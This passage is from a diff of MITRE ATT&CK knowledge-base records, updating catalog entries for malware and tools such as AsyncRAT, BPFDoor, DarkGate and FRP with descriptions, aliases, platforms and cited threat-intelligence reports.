+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1087",
+                            "external_id": "S1087"
+                        },
+                        {
+                            "source_name": "Telefonica Snip3 December 2021",
+                            "description": "Jornet, A. (2021, December 23). Snip3, an investigation into malware. Retrieved September 19, 2023.",
+                            "url": "https://telefonicatech.com/blog/snip3-investigacion-malware"
+                        },
+                        {
+                            "source_name": "Morphisec Snip3 May 2021",
+                            "description": "Lorber, N. (2021, May 7). Revealing the Snip3 Crypter, a Highly Evasive RAT Loader. Retrieved September 13, 2023.",
+                            "url": "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader"
+                        },
+                        {
+                            "source_name": "Cisco Operation Layover September 2021",
+                            "description": "Ventura, V. (2021, September 16). Operation Layover: How we tracked an attack on the aviation industry to five years of compromise. Retrieved September 15, 2023.",
+                            "url": "https://blog.talosintelligence.com/operation-layover-how-we-tracked-attack/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "AsyncRAT"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Aaron Jornet"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2023-10-10 17:19:12.868000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--9dbdadb6-fdbf-490f-a35f-38762d06a0d2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-10-17 00:14:20.652000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "BADCALL",
+                    "description": "[BADCALL](https://attack.mitre.org/software/S0245) is a Trojan malware variant used by the group [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT BADCALL)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0245",
+                            "external_id": "S0245"
+                        },
+                        {
+                            "source_name": "BADCALL",
+                            "description": "(Citation: US-CERT BADCALL)"
+                        },
+                        {
+                            "source_name": "US-CERT BADCALL",
+                            "description": "US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. Retrieved June 7, 2018.",
+                            "url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "BADCALL"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2025-04-25 14:44:12.926000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--64764dc6-a032-495f-8250-1e4c06bdc163",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "BITSAdmin",
+                    "description": "[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0190",
+                            "external_id": "S0190"
+                        },
+                        {
+                            "source_name": "Microsoft BITSAdmin",
+                            "description": "Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.",
+                            "url": "https://msdn.microsoft.com/library/aa362813.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "BITSAdmin"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Edward Millington"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-17 14:09:31.571000+00:00\"}}}",
+                    "previous_version": "1.5"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--8d1f89fd-4dde-40ab-80e0-a7b80249162e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-09-20 23:08:38.199000+00:00",
+                    "modified": "2026-05-12 15:12:00.737000+00:00",
+                    "name": "BPFDoor",
+                    "description": "[BPFDoor](https://attack.mitre.org/software/S1161) is a Linux based passive long-term backdoor used by China-based threat actors. First seen in 2021, [BPFDoor](https://attack.mitre.org/software/S1161) is named after its usage of Berkley Packet Filter (BPF) to execute single task instructions. [BPFDoor](https://attack.mitre.org/software/S1161) supports multiple protocols for communicating with a C2 including TCP, UDP, and ICMP and can start local or reverse shells that bypass firewalls using iptables.(Citation: Sandfly BPFDoor 2022)(Citation: Deep Instinct BPFDoor 2023)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1161",
+                            "external_id": "S1161"
+                        },
+                        {
+                            "source_name": "Harries JustForFun 2022",
+                            "description": " Jamie Harries. (2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved September 23, 2024.",
+                            "url": "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/"
+                        },
+                        {
+                            "source_name": "JustForFun",
+                            "description": "(Citation: Harries JustForFun 2022)"
+                        },
+                        {
+                            "source_name": "Backdoor.Solaris.BPFDOOR.ZAJE",
+                            "description": "(Citation: Harries JustForFun 2022)"
+                        },
+                        {
+                            "source_name": "Backdoor.Linux.BPFDOOR",
+                            "description": "(Citation: Merces BPFDOOR 2023)"
+                        },
+                        {
+                            "source_name": "Merces BPFDOOR 2023",
+                            "description": "Fernando Merces. (2023, July 13). Detecting BPFDoor Backdoor Variants Abusing BPF Filters. Retrieved September 23, 2024.",
+                            "url": "https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html"
+                        },
+                        {
+                            "source_name": "Deep Instinct BPFDoor 2023",
+                            "description": "Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor Malware Evolves \u2013 Stealthy Sniffing Backdoor Ups Its Game. Retrieved September 19, 2024.",
+                            "url": "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game"
+                        },
+                        {
+                            "source_name": "Sandfly BPFDoor 2022",
+                            "description": "The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023.",
+                            "url": "https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "BPFDoor",
+                        "JustForFun",
+                        "Backdoor.Linux.BPFDOOR",
+                        "Backdoor.Solaris.BPFDOOR.ZAJE"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.737000+00:00\", \"old_value\": \"2025-01-03 18:03:04.670000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--d1b7830a-fced-4be3-a99c-f495af9d9e1b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-10-07 19:05:48.886000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "BabyShark",
+                    "description": "[BabyShark](https://attack.mitre.org/software/S0414) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. (Citation: Unit42 BabyShark Feb 2019)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0414",
+                            "external_id": "S0414"
+                        },
+                        {
+                            "source_name": "LATEOP",
+                            "description": "(Citation: Mandiant APT43 March 2024)"
+                        },
+                        {
+                            "source_name": "BabyShark",
+                            "description": "(Citation: Unit42 BabyShark Feb 2019)(Citation: Unit42 BabyShark Apr 2019)"
+                        },
+                        {
+                            "source_name": "Unit42 BabyShark Apr 2019",
+                            "description": "Lim, M.. (2019, April 26). BabyShark Malware Part Two \u2013 Attacks Continue Using KimJongRAT and PCRat . Retrieved October 7, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/"
+                        },
+                        {
+                            "source_name": "Mandiant APT43 March 2024",
+                            "description": "Mandiant. (2024, March 14). APT43: North Korean Group Uses Cybercrime to Fund Espionage Operations. Retrieved May 3, 2024.",
+                            "url": "https://services.google.com/fh/files/misc/apt43-report-en.pdf"
+                        },
+                        {
+                            "source_name": "Unit42 BabyShark Feb 2019",
+                            "description": "Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "BabyShark",
+                        "LATEOP"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2024-05-06 20:38:32.432000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--42fdf9db-6005-4bb3-96f6-496b94ce519d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-12-17 01:09:17.837000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "BlackByte 2.0 Ransomware",
+                    "description": "[BlackByte 2.0 Ransomware](https://attack.mitre.org/software/S1181) is a replacement for [BlackByte Ransomware](https://attack.mitre.org/software/S1180). Unlike [BlackByte Ransomware](https://attack.mitre.org/software/S1180), [BlackByte 2.0 Ransomware](https://attack.mitre.org/software/S1181) does not have a common key for victim decryption. [BlackByte 2.0 Ransomware](https://attack.mitre.org/software/S1181) remains uniquely associated with [BlackByte](https://attack.mitre.org/groups/G1043) operations.(Citation: Microsoft BlackByte 2023)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1181",
+                            "external_id": "S1181"
+                        },
+                        {
+                            "source_name": "Microsoft BlackByte 2023",
+                            "description": "Microsoft Incident Response. (2023, July 6). The five-day job: A BlackByte ransomware intrusion case study. Retrieved December 16, 2024.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "BlackByte 2.0 Ransomware"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2025-03-09 16:01:39.889000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--97da6467-c9c5-4eb0-84d4-1234e937e534",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 17:48:45.413000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "Caminho",
+                    "description": "[Caminho](https://attack.mitre.org/software/S9016) is a downloader that has been used by threat actors since at least 2025 to deliver various strains of malware such as XWorm.(Citation: Zscaler BlindEagle DEC 2025)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9016",
+                            "external_id": "S9016"
+                        },
+                        {
+                            "source_name": "VMDetectLoader",
+                            "description": "(Citation: Zscaler BlindEagle DEC 2025)"
+                        },
+                        {
+                            "source_name": "Zscaler BlindEagle DEC 2025",
+                            "description": "Pellegrino, G. (2025, December 16). BlindEagle Targets Colombian Government Agency with Caminho and DCRAT. Retrieved April 16, 2026.",
+                            "url": "https://www.zscaler.com/blogs/security-research/blindeagle-targets-colombian-government-agency-caminho-and-dcrat"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Caminho",
+                        "VMDetectLoader"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2026-04-16 17:54:24.028000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--b350b47f-88fe-4921-8538-6d9c59bac84e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-03-03 15:37:41.440000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "Cyclops Blink",
+                    "description": "[Cyclops Blink](https://attack.mitre.org/software/S0687) is a modular malware that has been used in widespread campaigns by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus. [Cyclops Blink](https://attack.mitre.org/software/S0687) is assessed to be a replacement for [VPNFilter](https://attack.mitre.org/software/S1010), a similar platform targeting network devices.(Citation: NCSC Cyclops Blink February 2022)(Citation: NCSC CISA Cyclops Blink Advisory February 2022)(Citation: Trend Micro Cyclops Blink March 2022)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0687",
+                            "external_id": "S0687"
+                        },
+                        {
+                            "source_name": "Trend Micro Cyclops Blink March 2022",
+                            "description": "Haquebord, F. et al. (2022, March 17). Cyclops Blink Sets Sights on Asus Routers. Retrieved March 17, 2022.",
+                            "url": "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html"
+                        },
+                        {
+                            "source_name": "NCSC CISA Cyclops Blink Advisory February 2022",
+                            "description": "NCSC, CISA, FBI, NSA. (2022, February 23). New Sandworm malware Cyclops Blink replaces VPNFilter. Retrieved March 3, 2022.",
+                            "url": "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+                        },
+                        {
+                            "source_name": "NCSC Cyclops Blink February 2022",
+                            "description": "NCSC. (2022, February 23). Cyclops Blink Malware Analysis Report. Retrieved March 3, 2022.",
+                            "url": "https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Cyclops Blink"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2025-04-15 19:46:35.048000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--2f481072-e9f8-4452-be00-d1d7e43c2edc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 18:23:44.020000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "DCRAT",
+                    "description": "[DCRAT](https://attack.mitre.org/software/S9017) is a variant of the open-source [AsyncRAT](https://attack.mitre.org/software/S1087) developed in C# with additional capabilities such as patching Microsoft\u2019s Antimalware Scan Interface (AMSI).(Citation: Zscaler BlindEagle DEC 2025)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9017",
+                            "external_id": "S9017"
+                        },
+                        {
+                            "source_name": "Zscaler BlindEagle DEC 2025",
+                            "description": "Pellegrino, G. (2025, December 16). BlindEagle Targets Colombian Government Agency with Caminho and DCRAT. Retrieved April 16, 2026.",
+                            "url": "https://www.zscaler.com/blogs/security-research/blindeagle-targets-colombian-government-agency-caminho-and-dcrat"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "DCRAT"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-16 18:27:09.265000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--53ab35c2-d00e-491a-8753-41d35ae7e547",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-01-29 19:18:28.468000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "DarkComet",
+                    "description": "[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0334",
+                            "external_id": "S0334"
+                        },
+                        {
+                            "source_name": "DarkComet",
+                            "description": "(Citation: TrendMicro DarkComet Sept 2014)"
+                        },
+                        {
+                            "source_name": "DarkKomet",
+                            "description": "(Citation: TrendMicro DarkComet Sept 2014)"
+                        },
+                        {
+                            "source_name": "Fynloski",
+                            "description": "(Citation: TrendMicro DarkComet Sept 2014)"
+                        },
+                        {
+                            "source_name": "Krademok",
+                            "description": "(Citation: TrendMicro DarkComet Sept 2014)"
+                        },
+                        {
+                            "source_name": "FYNLOS",
+                            "description": "(Citation: TrendMicro DarkComet Sept 2014)"
+                        },
+                        {
+                            "source_name": "Malwarebytes DarkComet March 2018",
+                            "description": "Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.",
+                            "url": "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/"
+                        },
+                        {
+                            "source_name": "TrendMicro DarkComet Sept 2014",
+                            "description": "TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.",
+                            "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "DarkComet",
+                        "DarkKomet",
+                        "Fynloski",
+                        "Krademok",
+                        "FYNLOS"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2025-04-25 14:43:20.605000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--6f6f67c9-556d-4459-95c2-78d272190e52",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-02-09 19:52:30.428000+00:00",
+                    "modified": "2026-05-12 15:12:00.735000+00:00",
+                    "name": "DarkGate",
+                    "description": "[DarkGate](https://attack.mitre.org/software/S1111) first emerged in 2018 and has evolved into an initial access and data gathering tool associated with various criminal cyber operations. Written in Delphi and named \"DarkGate\" by its author, [DarkGate](https://attack.mitre.org/software/S1111) is associated with credential theft, cryptomining, cryptotheft, and pre-ransomware actions.(Citation: Ensilo Darkgate 2018) DarkGate use increased significantly starting in 2022 and is under active development by its author, who provides it as a Malware-as-a-Service offering.(Citation: Trellix Darkgate 2023)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1111",
+                            "external_id": "S1111"
+                        },
+                        {
+                            "source_name": "Ensilo Darkgate 2018",
+                            "description": "Adi Zeligson & Rotem Kerner. (2018, November 13). Enter The DarkGate - New Cryptocurrency Mining and Ransomware Campaign. Retrieved February 9, 2024.",
+                            "url": "https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign"
+                        },
+                        {
+                            "source_name": "Trellix Darkgate 2023",
+                            "description": "Ernesto Fern\u00e1ndez Provecho, Pham Duy Phuc, Ciana Driscoll & Vinoo Thomas. (2023, November 21). The Continued Evolution of the DarkGate Malware-as-a-Service. Retrieved February 9, 2024.",
+                            "url": "https://www.trellix.com/blogs/research/the-continued-evolution-of-the-darkgate-malware-as-a-service/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "DarkGate"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Serhii Melnyk, Trustwave SpiderLabs",
+                        "Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.735000+00:00\", \"old_value\": \"2025-10-21 03:02:05.582000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--36dd807e-b5bc-4c3e-91ed-80682360148c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-07-10 18:46:33.555000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "FRP",
+                    "description": "[FRP](https://attack.mitre.org/software/S1144), which stands for Fast Reverse Proxy, is an openly available tool that is capable of exposing a server located behind a firewall or Network Address Translation (NAT) to the Internet. [FRP](https://attack.mitre.org/software/S1144) can support multiple protocols including TCP, UDP, and HTTP(S) and has been abused by threat actors to proxy command and control communications.(Citation: FRP GitHub)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: RedCanary Mockingbird May 2020)(Citation: DFIR Phosphorus November 2021)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1144",
+                            "external_id": "S1144"
+                        },
+                        {
+                            "source_name": "DFIR Phosphorus November 2021",
+                            "description": "DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023.",
+                            "url": "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/"
+                        },
+                        {
+                            "source_name": "FRP GitHub",
+                            "description": "fatedier. (n.d.). What is frp?. Retrieved July 10, 2024.",
+                            "url": "https://github.com/fatedier/frp"
+                        },
+                        {
+                            "source_name": "RedCanary Mockingbird May 2020",
+                            "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.",
+                            "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/"
+                        },
+                        {
+                            "source_name": "Joint Cybersecurity Advisory Volt Typhoon June 2023",
+                            "description": "NSA et al. (2023, May 24). People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Retrieved July 27, 2023.",
+                            "url": "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "FRP"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
